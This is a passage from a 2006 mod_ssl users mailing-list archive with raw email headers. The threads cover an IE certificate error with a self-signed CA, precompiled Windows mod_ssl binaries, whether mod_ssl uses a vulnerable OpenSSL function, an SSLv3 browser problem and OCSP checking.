	by master.modssl.org (Postfix) with ESMTP id 6235114D899
	for ; Tue, 10 Oct 2006 12:49:42 +0200 (CEST)
Received: from localhost.localdomain (84-45-209-227.no-dns-yet.enta.net [84.45.209.227])
	by mail.ukfsn.org (Postfix) with ESMTP id 1B4B0E70D7
	for ; Tue, 10 Oct 2006 11:49:03 +0100 (BST)
Received: from [127.0.0.1] (helo=sydb.dyndns.org)
	by localhost.localdomain with esmtp (Exim 3.36 #1 (Debian))
	id 1GXF2C-000817-00
	for ; Tue, 10 Oct 2006 11:40:28 +0100
Received: from 127.0.0.1
        (SquirrelMail authenticated user mpacey)
        by sydb.dyndns.org with HTTP;
        Tue, 10 Oct 2006 11:40:28 +0100 (BST)
Message-ID: <40042.127.0.0.1.1160476828.squirrel@sydb.dyndns.org>
In-Reply-To: <1646.84.243.98.130.1160475495.squirrel@193.226.82.7>
References: <15704.82.76.22.104.1160146265.squirrel@193.226.82.7>   
    <36581.127.0.0.1.1160146309.squirrel@sydb.dyndns.org>   
    <36046.82.76.22.104.1160147882.squirrel@193.226.82.7>   
    <36686.127.0.0.1.1160152280.squirrel@sydb.dyndns.org>   
    <1443.84.243.98.130.1160473428.squirrel@193.226.82.7>   
    <1572.84.243.98.130.1160474560.squirrel@193.226.82.7>
    <1646.84.243.98.130.1160475495.squirrel@193.226.82.7>
Date: Tue, 10 Oct 2006 11:40:28 +0100 (BST)
Subject: Re: Encripted page would not load into IE
From: "Michael Pacey" 
To: modssl-users@modssl.org
User-Agent: SquirrelMail/1.4.4
MIME-Version: 1.0
Content-Type: text/plain;charset=iso-8859-1
Content-Transfer-Encoding: 8bit
X-Priority: 3 (Normal)
Importance: Normal
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Michael Pacey" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hmmm, sorry I'm not an IE expert but it sounds like you are at least on
the right track. Maybe check on an IE list or forum?

BB said:
> Sorry, my mistake. The CA shows up in the list, but I get still the same
> error.
>
>> I tried also to install the certificate of the CA in the Trusted Root
>> Certification Authorities folder. It says Import Successfull, but my CA
>> doesn't show up in the list.
>>
>> Any hints?
>>
>>> Apparently, it's someting wrong with the certificates, as IE Watch
>>> gets:
>>>
>>> ERROR_INTERNET_SEC_INVALID_CERT
>>>
>>> What could this be? Firefox works just fine with these certs.
>>> Additionaly,
>>> pop3s and imaps from Dovecot work fine with the same certs, even with
>>> MS
>>> Outlook and Outlook Express clients.
>>>
>>> It's a self created CA, with self signed certificates.
>>>
>>> Any suggestions for what should I check further?
>>>
>>> Thank you in advance!
>>>
>>> BBR
>>>
>>>
>>>> BB said:
>>>>> I made the tests with IE from at least 4 different computers, located
>>>>> in
>>>>> networks from 3 different ISP's.
>>>>>
>>>>> Yes, the connection is done, because ith shows up instantly with
>>>>> tail -f /var/log/apache/ssl_engine_log
>>>>>
>>>>>
>>>>
>>>> Sounds weird. You could try installing an HTTP capture tool like IE
>>>> Watch
>>>> and seeing if that gives any useful info.
>>>>
>>>> --
>>>> Michael Pacey
>>>>
>>>> ______________________________________________________________________
>>>> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>>>> User Support Mailing List                      modssl-users@modssl.org
>>>> Automated List Manager                            majordomo@modssl.org
>>>>
>>>
>>>
>>> ______________________________________________________________________
>>> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>>> User Support Mailing List                      modssl-users@modssl.org
>>> Automated List Manager                            majordomo@modssl.org
>>>
>>
>>
>> ______________________________________________________________________
>> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>> User Support Mailing List                      modssl-users@modssl.org
>> Automated List Manager                            majordomo@modssl.org
>>
>
>
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>
>


-- 
Michael Pacey

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Oct 10 16:20:38 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id EBF0814D899; Tue, 10 Oct 2006 16:20:37 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mail15.ca.com (mail15.ca.com [208.232.182.54])
	by master.modssl.org (Postfix) with ESMTP id 3BD9A14D836
	for ; Tue, 10 Oct 2006 16:20:36 +0200 (CEST)
Received: from USILMS12.ca.com ([141.202.201.12]) by mail15.ca.com with Microsoft SMTPSVC(6.0.3790.1830);
	 Tue, 10 Oct 2006 10:20:18 -0400
x-mimeole: Produced By Microsoft Exchange V6.5
Content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: quoted-printable
Subject: RE: Encrypted page would not load into IE
Date: Tue, 10 Oct 2006 10:20:17 -0400
Message-ID: <2629CC4E1D22A64593B02C43E855530301480D8B@USILMS12.ca.com>
in-reply-to: <40042.127.0.0.1.1160476828.squirrel@sydb.dyndns.org>
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: Encrypted page would not load into IE
Thread-Index: AcbsWciKrRd6pHWHQAaUdHCeMXYZNwAHRIAg
From: "Richters, Eriks A" 
To: 
X-OriginalArrivalTime: 10 Oct 2006 14:20:18.0715 (UTC) FILETIME=[368D96B0:01C6EC77]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Richters, Eriks A" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This definitly sounds like an IE problem.  Check MSDN,
http://msdn.microsoft.com. =20
If you can't find anything there, then contact MicroSoft Support.
Unfortunately, unless you're a large corporation, its hard to get good
support from them.

-----Original Message-----
From: owner-modssl-users@modssl.org
[mailto:owner-modssl-users@modssl.org] On Behalf Of Michael Pacey
Sent: Tuesday, October 10, 2006 6:40 AM
To: modssl-users@modssl.org
Subject: Re: Encripted page would not load into IE

Hmmm, sorry I'm not an IE expert but it sounds like you are at least on
the right track. Maybe check on an IE list or forum?

BB said:
> Sorry, my mistake. The CA shows up in the list, but I get still the
same
> error.
>
>> I tried also to install the certificate of the CA in the Trusted Root
>> Certification Authorities folder. It says Import Successfull, but my
CA
>> doesn't show up in the list.
>>
>> Any hints?
>>
>>> Apparently, it's someting wrong with the certificates, as IE Watch
>>> gets:
>>>
>>> ERROR_INTERNET_SEC_INVALID_CERT
>>>
>>> What could this be? Firefox works just fine with these certs.
>>> Additionaly,
>>> pop3s and imaps from Dovecot work fine with the same certs, even
with
>>> MS
>>> Outlook and Outlook Express clients.
>>>
>>> It's a self created CA, with self signed certificates.
>>>
>>> Any suggestions for what should I check further?
>>>
>>> Thank you in advance!
>>>
>>> BBR
>>>
>>>
>>>> BB said:
>>>>> I made the tests with IE from at least 4 different computers,
located
>>>>> in
>>>>> networks from 3 different ISP's.
>>>>>
>>>>> Yes, the connection is done, because ith shows up instantly with
>>>>> tail -f /var/log/apache/ssl_engine_log
>>>>>
>>>>>
>>>>
>>>> Sounds weird. You could try installing an HTTP capture tool like IE
>>>> Watch
>>>> and seeing if that gives any useful info.
>>>>
>>>> --
>>>> Michael Pacey
>>>>
>>>>
______________________________________________________________________
>>>> Apache Interface to OpenSSL (mod_ssl)
www.modssl.org
>>>> User Support Mailing List
modssl-users@modssl.org
>>>> Automated List Manager
majordomo@modssl.org
>>>>
>>>
>>>
>>>
______________________________________________________________________
>>> Apache Interface to OpenSSL (mod_ssl)
www.modssl.org
>>> User Support Mailing List
modssl-users@modssl.org
>>> Automated List Manager
majordomo@modssl.org
>>>
>>
>>
>>
______________________________________________________________________
>> Apache Interface to OpenSSL (mod_ssl)
www.modssl.org
>> User Support Mailing List
modssl-users@modssl.org
>> Automated List Manager
majordomo@modssl.org
>>
>
>
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>
>


--=20
Michael Pacey

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Oct 11 13:37:26 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 4A1ED14D89D; Wed, 11 Oct 2006 13:37:26 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from smtp107.biz.mail.re2.yahoo.com (smtp107.biz.mail.re2.yahoo.com [206.190.52.176])
	by master.modssl.org (Postfix) with SMTP id C52F014D847
	for ; Wed, 11 Oct 2006 13:37:25 +0200 (CEST)
Received: (qmail 69796 invoked from network); 11 Oct 2006 11:37:12 -0000
Received: from unknown (HELO D8R1TF41) (eyalaz@ren-services.com@70.60.40.18 with login)
  by smtp107.biz.mail.re2.yahoo.com with SMTP; 11 Oct 2006 11:37:12 -0000
From: "Erol Yalaz" 
To: 
Subject: Newbie Question regarding mod_ssl
Date: Wed, 11 Oct 2006 07:37:12 -0400
Organization: Renaissance Services
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----=_NextPart_000_002F_01C6ED08.10F068B0"
X-Mailer: Microsoft Office Outlook, Build 11.0.5510
Thread-Index: AcbtKZebbENHsV4OSouS4qs3CXjujQ==
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1409
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Erol Yalaz" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------=_NextPart_000_002F_01C6ED08.10F068B0
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: 7bit

I have a WIN2003 box with the latest Apache on it (2.2.3) and it is working
great.  I need to get mod_ssl working.  Unfortunately, I can't seem to
figure out how to enable it.  I have openssl installed and I was able to
create a cert with no problem.  Based upon what I have seen via google, I
would have to compile from source which I really don't want to do (and I am
not talented enough :-)).

 

Any suggestions?  Shouldn't there be some pre-compiled binaries out there?

 

Thanks - erolybird


------=_NextPart_000_002F_01C6ED08.10F068B0
Content-Type: text/html;
	charset="us-ascii"
Content-Transfer-Encoding: quoted-printable
















I have a WIN2003 box with the latest Apache on it =
(2.2.3)
and it is working great.  I need to get mod_ssl working. 
Unfortunately, I can’t seem to figure out how to enable it.  =
I have
openssl installed and I was able to create a cert with no problem.  =
Based
upon what I have seen via google, I would have to compile from source =
which I
really don’t want to do (and I am not talented enough =
J).<=
/p>


 



Any suggestions?  Shouldn’t there be some
pre-compiled binaries out there?



 



Thanks – erolybird









------=_NextPart_000_002F_01C6ED08.10F068B0--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Oct 11 13:44:39 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 5567D14D8A6; Wed, 11 Oct 2006 13:44:39 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mx1.werum.de (mx1.werum.de [62.156.157.70])
	by master.modssl.org (Postfix) with ESMTP id 16D3414D847
	for ; Wed, 11 Oct 2006 13:44:38 +0200 (CEST)
Received: from werum815.werum.net (mailsmtp1.werum.net [172.20.104.15])
	by mx1.werum.de (Postfix) with ESMTP id 6E9D731A90E
	for ; Wed, 11 Oct 2006 13:44:22 +0200 (CEST)
Received: from localhost (unknown [192.168.1.3])
	by werum815.werum.net (Postfix) with ESMTP id 0857093300;
	Wed, 11 Oct 2006 13:44:20 +0200 (CEST)
Received: from werum815.werum.net ([192.168.1.1])
 by localhost (mailclaw.werum.net [192.168.1.3]) (amavisd-new, port 10024)
 with ESMTP id 08144-10; Wed, 11 Oct 2006 13:39:20 +0200 (CEST)
Received: from [172.20.103.158] (werum758.werum.net [172.20.103.158])
	by werum815.werum.net (Postfix) with ESMTP id 7E044932FE
	for ; Wed, 11 Oct 2006 13:44:18 +0200 (CEST)
Message-ID: <452CD90D.5030708@werum.de>
Date: Wed, 11 Oct 2006 13:44:13 +0200
From: Eckard Wille 
User-Agent: Thunderbird 1.5.0.7 (Windows/20060909)
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: Newbie Question regarding mod_ssl
References: 
In-Reply-To: 
X-Enigmail-Version: 0.94.0.0
Content-Type: text/plain; charset=windows-1252
Content-Transfer-Encoding: 8bit
X-Virus-Scanned: amavisd-new at werum.net
X-Spam-Status: No, hits=-5.898 tagged_above=-999 required=3 tests=ALL_TRUSTED,
 AWL, BAYES_00
X-Spam-Level: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Eckard Wille 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Erol Yalaz schrieb:
> I have a WIN2003 box with the latest Apache on it (2.2.3) and it is
> working great.  I need to get mod_ssl working.  Unfortunately, I can’t
> 
> Any suggestions?  Shouldn’t there be some pre-compiled binaries out there?

http://www.apachelounge.com/download/

If you trust them :-)

Greetings
Eckard
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Oct 11 18:38:24 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 0B55E14D899; Wed, 11 Oct 2006 18:38:24 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from metis.sjsu.edu (metis.sjsu.edu [130.65.3.15])
	by master.modssl.org (Postfix) with ESMTP id 632BE14D847
	for ; Wed, 11 Oct 2006 18:38:22 +0200 (CEST)
Received: from slis.sjsu.edu (slis.sjsu.edu [130.65.21.2])
	by metis.sjsu.edu (8.12.10+Sun/8.13.1) with ESMTP id k9BGc9LV010869
	for ; Wed, 11 Oct 2006 09:38:09 -0700 (PDT)
Received: from localhost (slaufer@localhost)
	by slis.sjsu.edu (8.13.6/8.12.8) with ESMTP id k9BGc9af028376
	for ; Wed, 11 Oct 2006 09:38:09 -0700 (PDT)
Date: Wed, 11 Oct 2006 09:38:09 -0700 (PDT)
From: Stanley Laufer 
To: modssl-users@modssl.org
Subject: Does Mod_SSL use SSL_get_shared_ciphers()?
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Stanley Laufer 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Does anyone know if Mod_SSL uses the SSL_get_shared_ciphers()
function from OpenSSL?

As you may know a buffer overflow has been detected in that
function in OpenSSL versions prior to 0.9.8d.

I'm trying to find out if Mod_SSL uses the vulnerable function.

Thanks in advance.



Stanley E. Laufer
Network Administrator
School of Library and Information Science
San Jose State University

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Oct 11 18:45:55 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 89B0B14D899; Wed, 11 Oct 2006 18:45:55 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from acrux.ligo.caltech.edu (acrux.ligo.caltech.edu [131.215.115.14])
	by master.modssl.org (Postfix) with ESMTP id 776B414D847
	for ; Wed, 11 Oct 2006 18:45:53 +0200 (CEST)
Received: from tarazed.ligo.caltech.edu (tarazed [131.215.115.31])
	by acrux.ligo.caltech.edu (8.12.11/8.12.11) with ESMTP id k9BGjdc9023422
	(version=TLSv1/SSLv3 cipher=DHE-RSA-AES256-SHA bits=256 verify=NOT)
	for ; Wed, 11 Oct 2006 09:45:40 -0700 (PDT)
Received: from tarazed.ligo.caltech.edu (localhost.localdomain [127.0.0.1])
	by tarazed.ligo.caltech.edu (8.13.4/8.13.4) with ESMTP id k9BGjY7S024233
	for ; Wed, 11 Oct 2006 09:45:34 -0700
Received: (from pehrens@localhost)
	by tarazed.ligo.caltech.edu (8.13.4/8.13.4/Submit) id k9BGjYiD024232
	for modssl-users@modssl.org; Wed, 11 Oct 2006 09:45:34 -0700
Date: Wed, 11 Oct 2006 09:45:34 -0700
From: Phil Ehrens 
To: modssl-users@modssl.org
Subject: Re: Does Mod_SSL use SSL_get_shared_ciphers()?
Message-ID: <20061011164534.GA21958@ligo.caltech.edu>
References: 
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: 
Shoe-Size: 9-1/2
User-Agent: Mutt/1.5.12-2006-07-14
X-Spam-Score: undef - Domain Whitelisted (ligo.caltech.edu: )
X-Canit-Stats-ID: 4664208 - 83f2e9c8a9c6
X-Scanned-By: CanIt (www . roaringpenguin . com) on 131.215.115.14
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Phil Ehrens 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Stanley Laufer wrote:
> Does anyone know if Mod_SSL uses the SSL_get_shared_ciphers()
> function from OpenSSL?
> 
> As you may know a buffer overflow has been detected in that
> function in OpenSSL versions prior to 0.9.8d.
> 
> I'm trying to find out if Mod_SSL uses the vulnerable function.

I just checked a couple different versions and did not see that
function.
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Oct 11 21:09:08 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 15DB814D887; Wed, 11 Oct 2006 21:09:08 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from 611wexpf1.cityofhouston.net (611wexpf1.cityofhouston.net [204.235.237.124])
	by master.modssl.org (Postfix) with ESMTP id 2D04214D847
	for ; Wed, 11 Oct 2006 21:09:05 +0200 (CEST)
Received: by 611WEXPF1.cityofhouston.net with Internet Mail Service (5.5.2653.19)
	id <44FZB1K1>; Wed, 11 Oct 2006 14:08:49 -0500
Message-ID: <0BD1505F7EB5114B9956F32D699303C9160BC963@611wex03.cityofhouston.net>
From: "Kong, Yi - HPL" 
To: "'modssl-users@modssl.org'" 
Subject: Question on version
Date: Wed, 11 Oct 2006 14:08:47 -0500
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
Content-Type: multipart/alternative;
	boundary="----_=_NextPart_001_01C6ED68.ADF64F20"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Kong, Yi - HPL" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This message is in MIME format. Since your mail reader does not understand
this format, some or all of this message may not be legible.

------_=_NextPart_001_01C6ED68.ADF64F20
Content-Type: text/plain

Hi, We have Intranet server with apache 2.0.54 and openssl 0.9.8 self-made
certificate. It is accessed by IE 6.0 with no problem, but will stop and get
"the connection has terminated unexpectedly. Some data may have been
transferred" when I use Firefox or Netscape (all version ).

After I unmark v3.0 from Firefox security, I can access the site. 

>From the ssl_request_log, it works well with V2.0 or V3.0. Here is it: 



1/Oct/2006:12:06:11 -0500] 10.34.145.36 SSLv3 RC4-MD5 "GET
/graphics/jibcol3.j 
pg HTTP/1.1" - 
#           tail ssl_request_log 
[11/Oct/2006:12:06:10 -0500] 10.34.145.36 SSLv3 RC4-MD5 "GET /mininav.html
HTTP/ 
1.1" - 
[11/Oct/2006:12:06:11 -0500] 10.34.145.36 SSLv3 RC4-MD5 "GET /area.html
HTTP/1.1 
" - 
[11/Oct/2006:12:06:11 -0500] 10.34.145.36 SSLv3 RC4-MD5 "GET
/graphics/mission_g 
raphic.jpg HTTP/1.1" - 
[11/Oct/2006:12:06:11 -0500] 10.34.145.36 SSLv3 RC4-MD5 "GET
/graphics/maus_roug 
e.jpg HTTP/1.1" - 
[11/Oct/2006:12:06:11 -0500] 10.34.145.36 SSLv3 RC4-MD5 "GET
/graphics/newnav3.g 
if HTTP/1.1" - 
[11/Oct/2006:12:06:11 -0500] 10.34.145.36 SSLv3 RC4-MD5 "GET
/graphics/roll_back 
3.gif HTTP/1.1" - 
[11/Oct/2006:12:06:11 -0500] 10.34.145.36 SSLv3 RC4-MD5 "GET
/graphics/jibcol3.j 
pg HTTP/1.1" - 
[11/Oct/2006:13:55:07 -0500] 10.34.145.36 SSLv2 RC4-MD5 "GET /resources.html
HTT 
P/1.1" 3218 
[11/Oct/2006:13:55:07 -0500] 10.34.145.36 SSLv2 RC4-MD5 "GET
/graphics/res_banne 
r.gif HTTP/1.1" 2090 
[11/Oct/2006:13:55:07 -0500] 10.34.145.36 SSLv2 RC4-MD5 "GET /favicon.ico
HTTP/1 
.1" 209 

Anybody can tell me why? Thanks 

Yi 


  _____  

<< ella for Spam Control >> has removed 4797 Spam messages and set aside
10203 Newsletters for me
You can use it too - and it's FREE!  www.ellaforspam.com
 	

------_=_NextPart_001_01C6ED68.ADF64F20
Content-Type: text/html
Content-Transfer-Encoding: quoted-printable













Hi, We have Intranet server with =
apache 2.0.54 and openssl 0.9.8 self-made certificate. It is accessed =
by IE 6.0 with no problem, but will stop and get "the connection =
has terminated unexpectedly. Some data may have been transferred" =
when I use Firefox or Netscape (all version ).



After I unmark v3.0 from Firefox =
security, I can access the site.




From the ssl_request_log, it works =
well with V2.0 or V3.0. Here is it:








1/Oct/2006:12:06:11 -0500] =
10.34.145.36 SSLv3 RC4-MD5 "GET /graphics/jibcol3.j


pg HTTP/1.1" -


#           =
tail ssl_request_log


[11/Oct/2006:12:06:10 -0500] =
10.34.145.36 SSLv3 RC4-MD5 "GET /mininav.html HTTP/


1.1" -


[11/Oct/2006:12:06:11 -0500] =
10.34.145.36 SSLv3 RC4-MD5 "GET /area.html HTTP/1.1


" -


[11/Oct/2006:12:06:11 -0500] =
10.34.145.36 SSLv3 RC4-MD5 "GET /graphics/mission_g


raphic.jpg HTTP/1.1" -


[11/Oct/2006:12:06:11 -0500] =
10.34.145.36 SSLv3 RC4-MD5 "GET /graphics/maus_roug


e.jpg HTTP/1.1" -


[11/Oct/2006:12:06:11 -0500] =
10.34.145.36 SSLv3 RC4-MD5 "GET /graphics/newnav3.g


if HTTP/1.1" -


[11/Oct/2006:12:06:11 -0500] =
10.34.145.36 SSLv3 RC4-MD5 "GET /graphics/roll_back


3.gif HTTP/1.1" -


[11/Oct/2006:12:06:11 -0500] =
10.34.145.36 SSLv3 RC4-MD5 "GET /graphics/jibcol3.j


pg HTTP/1.1" -


[11/Oct/2006:13:55:07 -0500] =
10.34.145.36 SSLv2 RC4-MD5 "GET /resources.html HTT


P/1.1" 3218


[11/Oct/2006:13:55:07 -0500] =
10.34.145.36 SSLv2 RC4-MD5 "GET /graphics/res_banne


r.gif HTTP/1.1" 2090


[11/Oct/2006:13:55:07 -0500] =
10.34.145.36 SSLv2 RC4-MD5 "GET /favicon.ico HTTP/1


.1" 209




Anybody can tell me why? =
Thanks




Yi





<=
/tr>
<< ella for Spam Control >> =
has removed 4797 Spam messages and set aside =
10203 Newsletters for me
 You can use it too - and it's =
FREE!  www.ellaforspam.com

------_=_NextPart_001_01C6ED68.ADF64F20--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Oct 11 22:19:42 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 378AB14D8A6; Wed, 11 Oct 2006 22:19:42 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from warspite.cnchost.com (warspite.concentric.net [207.155.248.9])
	by master.modssl.org (Postfix) with ESMTP id BAE3D14D899
	for ; Wed, 11 Oct 2006 22:19:41 +0200 (CEST)
Received: from [172.27.172.173] (unknown [66.194.95.2])
	(as wrowe@rowe-clan.net)
	by warspite.cnchost.com (ConcentricHost(2.54) Relay) with ESMTP id 163BAB38FC
	for ; Wed, 11 Oct 2006 16:19:26 -0400 (EDT)
Message-ID: <452D51C0.1080906@rowe-clan.net>
Date: Wed, 11 Oct 2006 15:19:12 -0500
From: "William A. Rowe, Jr." 
User-Agent: Thunderbird 1.5.0.7 (X11/20060913)
MIME-Version: 1.0
To:  modssl-users@modssl.org
Subject: Re: Newbie Question regarding mod_ssl
References:  <452CD90D.5030708@werum.de>
In-Reply-To: <452CD90D.5030708@werum.de>
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "William A. Rowe, Jr." 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

http://hunter.campbus.com/ - and yes Chris is trustworthy.  Blame Canada :)

Bill

Eckard Wille wrote:
> Erol Yalaz schrieb:
>> I have a WIN2003 box with the latest Apache on it (2.2.3) and it is
>> working great.  I need to get mod_ssl working.  Unfortunately, I can’t
>>
>> Any suggestions?  Shouldn’t there be some pre-compiled binaries out there?
> 
> http://www.apachelounge.com/download/
> 
> If you trust them :-)
> 
> Greetings
> Eckard
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 
> 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Oct 11 22:32:20 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 2A8F214D899; Wed, 11 Oct 2006 22:32:20 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from talk.nabble.com (www.nabble.com [72.21.53.35])
	by master.modssl.org (Postfix) with ESMTP id B869114D847
	for ; Wed, 11 Oct 2006 22:32:18 +0200 (CEST)
Received: from [72.21.53.38] (helo=jubjub.nabble.com)
	by talk.nabble.com with esmtp (Exim 4.50)
	id 1GXkkH-0002h0-Fp
	for modssl-users@modssl.org; Wed, 11 Oct 2006 13:32:05 -0700
Message-ID: <6764147.post@talk.nabble.com>
Date: Wed, 11 Oct 2006 13:32:05 -0700 (PDT)
From: pbains 
To: modssl-users@modssl.org
Subject: Re: OCSP? (UNCLASSIFIED)
In-Reply-To: <8B3BECEEF7677D4F96CC9C9E2AB9DE7D02B7DEA3@emswhl1.pac.disa.mil>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
X-Nabble-From: paul.opensource@gmail.com
References: <8B3BECEEF7677D4F96CC9C9E2AB9DE7D02B7DEA3@emswhl1.pac.disa.mil>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: pbains 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


My organization is headed down this road after experiencing performance
degradation from checking large CRLs. As we come up with a solution, will
post what I find out. Alternatively, if you have any information, would
appreciate it, thanks!

Paul


Victor, Dwight P CTR DISA PAC wrote:
> 
> Classification:  UNCLASSIFIED 
> Caveats: NONE
> 
> 
> Hello List!
> 
> Has anyone had any experience/success with using mod_ssl + Apache v2 to
> query an OCSP responder regarding the status of an end-user provided
> certificate and allow/deny access based on the response?  Any tips,
> suggestions, discussion would be appreciated.
> 
> Best Regards,
> 
> Dwight...
> 
> ---
> Dwight Victor, CISSP (Contractor)
> Systems Administrator / Webmaster
> General Dynamics C4 Systems
> EMAIL: dwight.victor.ctr@disa.mil
> TEL:   (808) 653-3677 ext 229
> 
> Classification:  UNCLASSIFIED 
> Caveats: NONE
> 
> 
>  
> 

-- 
View this message in context: http://www.nabble.com/OCSP--%28UNCLASSIFIED%29-tf1638361.html#a6764147
Sent from the mod_ssl - Users mailing list archive at Nabble.com.

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Oct 11 22:42:49 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id C650A14D899; Wed, 11 Oct 2006 22:42:49 +0200 (CEST)
